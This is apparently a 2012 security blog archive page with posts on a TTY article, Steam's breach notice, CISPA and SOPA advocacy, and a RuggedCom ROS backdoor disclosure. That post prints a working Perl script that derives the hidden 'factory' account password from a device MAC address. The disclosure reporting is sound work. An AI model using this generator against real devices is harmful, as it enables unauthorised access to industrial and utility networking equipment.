Your security, networking, programming, and application news source.
Google

Friday, September 21, 2012

[Link] Understanding TTY

www.linusakesson.net
Linus Ã…kesson (July 25, 2008)

<The TTY demystified>

Tuesday, April 24, 2012

RuggedCom Unresponsive, Rugged Operating System (ROS®) Backdoor Disclosed

A factory backdoor account in RuggedCom's Rugged Operating System (ROS®) has been disclosed. <RuggedCom> is a manufacturer of rugged networking equipment popular in industrial, utility, and defense industries. These sensitive consumers of frequently security sensitive networking devices have recently been informed by RuggedCom, who has acknowledged the backdoor. Due somewhat to RuggedCom's unresponsiveness after acknowledgement, this information was publicly disclosed. According to the disclosure, an undocumented account, "factory", which cannot be disabled, is included in all released versions of ROS® with a password generated from the device's MAC address.

<Secunia - Full Disclosure CVE-2012-1803 (April 23, 2012)>

#!/usr/bin/perl
if (! defined $ARGV[0]) {
print "+========================================== \n";
print "+ RuggedCom ROS Backdoor Password Generator \n";
print "+ JC CREW April 23 2012 \n";
print "+ Usage:\n$0 macaddress \n";
print "+========================================== \n";
exit; }
$a = $ARGV[0];
$a =~  s/[^A-F0-9]+//simg;
@b = reverse split /(\S{2})/,$a;
$c = join "", @b;
$c .= "0000";
$d = hex($c) % 999999929;
print "$d\n";

Sunday, April 22, 2012

CISPA - US Internet Survalience Bill

Customers voice their opinion to supporters of the newest dangerous Internet bill, CISPA (H.R. 3523).



Cyber Intelligence Sharing and Protection Act (CISPA), also known as H.R. 3523, is not just another horribly irresponsible SOPA / PIPA. This bill focuses on a real issue, but does it the most horrible and irresponsible way possible.

CISPA is meant to lay the foundation for private companies and Internet service providers to share information with the US Government about cyber security threats. The main problems are the lack of any real definition to what a threat is, the bypassing of all existing laws to protect collection and sharing of your personal data by private companies, the lack of restriction of what information can be shared and with who, the warrant-less unrestricted sharing of data with the NSA, DHS, and other government agencies, and encouragement of heavy broad surveillance of citizens.

This bill will directly encourage private companies such as your cellular carrier (Verizon / AT&T), your operating system (Microsoft), your anti virus scanner (Symantec), and your Internet service provider (ISP) to collect huge amounts of your personal data to a level that would previously be illegal. This CISPA authority would override privacy protection laws (such as protecting of your medical records), local eavesdropping and wiretapping laws, and allow collection of almost any data based on recklessly vague "cybersecurity" purposes. This private companies would be able to collect this data anonymously without ever having to tell you they collected it or what they collected. They would be free to share the data with any company they want, possibly even selling the data, with complete immunity to legal actions such as lawsuits of criminal charges for privacy violations. They would be allowed to dump all this data on any US Government agency without requiring a warrant.

This is at the wake of the NSA beginning building the country's biggest spy center in Utah. As well as a recent NSA whistle-blower's claim that the US Government has illegally been engaged in wide spread Internet surveillance for quite some time having intercepted 20 Trillion communications and has copies of "most of your Emails". Again, illegally and therefor with no oversight, I might add.

CISPA (H.R. 3523) is another horrible dangerous and irresponsible bill that will erode all existing personal data and privacy protection laws, and give ALL your data to private companies to use and abuse under the table with complete immunity from legal repercussions.

Verizon disgustingly supports this bill. We call on you, Verizon, to change your stance away from this strong-arm theft and abuse of citizens personal data!

Verizon's letter of support for CISPA:
http://intelligence.house.gov/sites/intelligence.house.gov/files/documents/Verizon113011.pdf


More Information:

Electronic Freedom Foundation:
http://cyberspying.eff.org/

TIME Magazine:
http://techland.time.com/2012/04/19/5-reasons-the-cispa-cybersecurity-bill-should-be-tossed/



Source: Verizon Wireless Community Forum
April 22, 2012 12:00PM
(The original text has been modified for formatting, linking, and alignment.)

Some other supporters:
  • AT&T
  • Boeing
  • BSA
  • Business Roundtable
  • CSC
  • COMPTEL
  • CTIA - The Wireless Association
  • Cyber, Space & Intelligence Association
  • Edison Electric
  • EMC
  • Exelon
  • Facebook
  • The Financial Services Roundtable
  • IBM
  • Independent Telephone & Telecommunications Alliance
  • Information Technology Industry Council
  • Intel
  • Internet Security Alliance
  • Lockheed Martin
  • Microsoft
  • National Cable & Telecommunications Association
  • NDIA
  • Oracle
  • Symantec
  • TechAmerica
  • US Chamber of Commerce
  • US Telecom - The Broadband Association
  • Verizon

Sunday, February 12, 2012

Steam Warns User's Personal Info and Credit Card Data Swiped in Last Year's Intrusion


<Steam>, the popular gaming digital rights management platform by <Valve>, pushed an update today containing an "update news" page, which warned of the discovery that personal data was stolen in last year's intrusion. Steam warned that a copy of a backup file about transactions between 2004 and 2008 may have been obtained. Steam assured that no Steam account passwords were included, but mentioned the following user data being contained in the taken data:

  • User Names
  • EMail Addresses
  • Encrypted Billing Adresses
  • Encrypted Credit Card Information



Steam Update News Text:
February 10th, 2012
Dear Steam Users and Steam Forum Users:

We continue our investigation of last year’s intrusion
with the help of outside security experts. In my last
note about this, I described how intruders had accessed
our Steam database but we found no evidence that the
intruders took information from that database. That is
still the case.

Recently we learned that it is probable that the
intruders obtained a copy of a backup file with 
information about Steam transactions between 2004 and
2008. This backup file contained user names, email
addresses, encrypted billing addresses and encrypted
credit card information. It did not include Steam
passwords.

We do not have any evidence that the encrypted credit
card numbers or billing addresses have been compromised.
However as I said in November it’s a good idea to watch
your credit card activity and statements. And of course
keeping Steam Guard on is a good idea as well.

We are still investigating and working with law
enforcement authorities. Some state laws require a more
formal notice of this incident so some of you will get
that notice, but we wanted to update everyone with this
new information now.

Gabe

Tuesday, January 17, 2012

Fight SOPA and PROTECT IP

This blog would be forced offline if the currently proposed U.S. legislature is passed.

SOPA and PROTECT IP are poorly defined, easily abused, unclear bills proposed to the U.S. House and Senate with unrealistic expectations of Internet technology, which will stifle free speech and innovation while giving the U.S. Government the ability to censor the U.S. Internet and seize U.S. domain names with little reason or limitation. Enforcement of these bills would require the restructuring of many web services which would affect Internet users globally.

These bills threaten a blog like this through vague terminology lacking definitions, such as "committing or facilitating the commission of criminal violations" [of copyright infringement or counterfeit products]. "Facilitation" can often be argued as simply teaching or demonstrating how to do something. As I interpret this, any website with Hacking/Hacker/Hack in the name or topic would technically be automatically out of compliance and be at the mercy of enforcement of these laws to not permanently seize associated domain names and possibly further prosecute owners.

These bills create a largely undefined take down process that will clearly leave many types of web services, such as the free blog host here at blogger.com, unable to meet requirements. No provisions for abuse make these vague bills a prime target for more abuse than the DMCA takedown request system has historically endured.

Some other concerning areas of these bills include provisions against circumvention of such measures, which the U.S. State department funds creating hypocritical tools for doing just that, to offer citizens under [foreign]"repressive regimes" uncensored access to the internet.

Please do all you can to educate the public and urge U.S. citizens to contact their government representatives urging them to vote against these reckless bills.


Bill text PROTECT IP (Senate):
http://hdl.loc.gov/loc.uscongress/legislation.112s968

Bill text SOPA - Stop Online Piracy Act (House):
http://hdl.loc.gov/loc.uscongress/legislation.112hr3261

A Layman's examination:
http://blog.reddit.com/2012/01/technical-examination-of-sopa-and.html

History of DCMA takedown abuse:
https://www.eff.org/takedowns

How these bills violate free speech and innovation:
https://www.eff.org/deeplinks/2012/01/how-pipa-and-sopa-violate-white-house-principles-supporting-free-speech

U.S. State department funds tools to circumvent censoring:
http://www.bloomberg.com/news/2011-04-20/u-s-funds-help-democracy-activists-evade-internet-crackdowns.html

I apologize for any inconvenience. We will be returning soon.

SoCo